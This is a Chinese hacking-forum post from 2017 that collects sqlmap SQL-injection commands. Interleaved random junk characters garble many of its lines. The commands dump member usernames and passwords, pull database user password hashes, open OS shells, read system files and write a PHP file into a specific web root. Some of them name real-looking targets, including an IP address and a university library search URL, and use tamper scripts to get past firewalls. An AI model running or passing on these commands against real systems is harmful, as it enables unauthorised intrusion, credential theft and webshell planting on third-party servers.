找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1814|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
) k' p, s) S% y0 t' Q8 [3 t3 E" r3 J
$ C! V7 T( ]5 u- w/ r# lupdate :::::>     in the folder   after  execute    following   order : svn update& x% f4 u& I" I+ ?0 a  x
9 X" Z3 O; Z% c0 w: ?: k
sqlmap.py -r 1.txt --current-db
+ [9 K7 _0 t& j9 h3 ~8 r8 l) M
) Z3 X6 P9 e3 @v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
1 {* u+ m+ q7 x: P& a7 H4 C; V3 y
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))   M: e6 l% [$ h5 b$ }/ R
猜解数据库5 c2 [* y  I; w4 q! j: b' V* O3 z
./sqlmap.py -u "injection-url" --dbs7 k- j2 T+ p3 O7 R% H1 ^4 Y
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
$ K8 P- L8 y$ g1 \
" r7 u' ]2 l/ B7 u; S) Q- I猜解表名
: Y) t( i3 i2 m  K./sqlmap.py -u "injection-url" -D database_name --tables
/ e4 f8 V$ _3 N  G- q( F2 s( ~
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"$ `. p% g  S* [  ^& C3 Q6 n7 g# w
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" % p7 K) f" X; p+ q% ?2 ~  Q5 o. M
$ h; B% Q/ B, v  ^; c
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
+ j* e$ o* v3 I
" l. c- P. f4 m5 G5 vsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
; ?, U9 D0 C. h7 G4 ysqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"4 e3 ~- t7 Z7 U2 M* o& ]
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
( h* N2 l0 e5 t) J1 B1 E) Esqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
& \. P" ]9 p9 E9 i( i7 @* T0 R
1 s& y- D. @+ j" _3 W2 B0 c" Msqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
" `7 a( C8 Q& b+ R3 V8 C+ C' gsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"; ]- O0 C0 [; Z5 a5 j2 L
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
; B' g# g, c9 h8 p, F% t! gsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
  c+ d3 D! U' M. v2 F# @8 c1 Hsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump1 v- f7 R' Z* `9 Y; Z, X

, H; E: F" y7 Ysqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
& N" T1 a- F4 q  msqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
* Q) z" i: B& b! a& K" \" N3 K" `" N0 h6 G' L
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"/ y4 Y+ |8 B8 U0 O
猜解列名. X3 K! _) j, _5 P6 O& h, o
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns9 W, }# v& c& w8 r

' d/ X9 t2 N+ p, \5 p; ksqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 8 Z, w+ l6 R2 [
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
* U# W4 I" i! D; x0 c1 M3 dsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
! ~* n' {+ E' U8 A8 \3 ?* u  z; v5 Q4 m+ P' a
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"" g% }' [! g1 l- n* b! i8 G# X
&submit=Go7 f4 b2 x( y+ P& _7 T, @5 @
猜解值: E2 K1 N5 M6 P% X! i
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump' c1 E( `6 P- s
========================================================: z; x4 a- }+ y% l- D" L2 Q
搜索表名中包括mana字符的
8 J- K5 g7 ^5 J1 P% w5 E. E7 L/sqlmap.py -u "injection-url" -T mana --search
: Y) a) y- @: L& `! W$ B) u. g返回一个交互式sql shell
4 R. \0 R# u) Z; ]  j% G/sqlmap.py -u "injection-url" --sql-shell
" g' W# f' D: L/ k$ O6 E0 F. Z读取指定文件(需权限)
: F! ?  V( R, _4 e/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
6 V. p, u/ P, E查看当前 用户 及 数据库 ! W: Z8 A4 T# b# `
/sqlmap.py -u "injection-url" --current-user --current-db
: ]& A# q. [* ~$ f) t: m$ ?本地文件 写入 远程目标绝对路径
( u7 k8 Y6 x" B+ d( j/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径  g/ b2 g$ M# r4 q
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
5 i8 x0 x* l! j4 v1 b( O! J  m  F" r' s- M: q3 H: ?
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
5 F  s6 K) A2 U/ M! u8 {. N查看某用的权限
- j# B) L- S+ v+ R2 V; V0 `/sqlmap.py -u "injection-url" --privileges -U root" u6 n7 [1 P: d6 F
查看当前用户是否为dba7 [+ G$ l1 z( i' G7 J5 u
/sqlmap.py -u "injection-url" --is-dba* b- g9 Y! t% a* i* y& w) z$ ~6 t
读取所有数据库用户或指定数据库用户的密码. X+ ]! g( D+ _) U0 `! @" z
sqlmap.py -r 1.txt --users --passwords
* v9 @% t1 m. ]: i  Esqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" + B+ Q  |. C0 Z
/ Y! x% s6 D( z8 B. {
/sqlmap.py -u "injection-url" --passwords -U root
% {" `; k' I8 o# Z0 x# x3 L( B# K# Z& a: F& h5 o9 G
--start&&--stop 与 --first&&--last 的区别8 }; S9 L* C2 \& V0 v
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
1 g' j# i- z! S- A( ~( Y% w1 u) d- K- v/ y% o* _* ?
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)3 Z- ~; P: c( e9 Y# y
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables6 e: j' {4 P7 i9 B# D2 m' z
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns' A1 g+ z* w, z) N
) F4 _: p7 K3 ]; Z7 A6 o( h
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
/ ^  A( f. C0 _- B: M8 c0 y3 b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"2 x; a* G' [7 z6 c
& c, w# e( Z- I: j; f1 Q3 {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表